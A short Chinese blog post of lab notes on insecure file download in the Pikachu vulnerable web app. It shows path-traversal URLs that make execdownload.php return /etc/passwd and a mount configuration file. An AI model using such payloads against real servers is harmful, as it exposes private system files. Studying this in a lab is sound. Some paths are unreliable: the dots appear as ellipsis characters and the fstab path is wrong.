您的位置: 首页  >  文章  >  0508 8-1 不安全的文件下载原理和案例演示

0508 8-1 不安全的文件下载原理和案例演示

分类: 文章 2024-06-16 20:34:34

0508 8-1 不安全的文件下载原理和案例演示在pikachu上 Unsafe Filedownload 中 Unsafe Filedownload 任意下载一个图片(注:右键 点击 “新建标签页打开链接”)
0508 8-1 不安全的文件下载原理和案例演示0508 8-1 不安全的文件下载原理和案例演示0508 8-1 不安全的文件下载原理和案例演示

看URL:127.0.0.1/pikachu/vul/unsafedownload/execdownload.php?filename=ns.png
改为:127.0.0.1/pikachu/vul/unsafedownload/execdownload.php?filename=…/…/…/…/…/…/…/…/…/etc/passwd
或者:127.0.0.1/pikachu/vul/unsafedownload/execdownload.php?filename=…/…/…/…/…/…/…/…/…/etc/passwd/fstab (磁盘挂载的配置文件)
即可下载相应文件
(由于与视频中的电脑不一样 文件也不一样 所以没有图片演示 视频中linux系统)
0508 8-1 不安全的文件下载原理和案例演示0508 8-1 不安全的文件下载原理和案例演示

相关推荐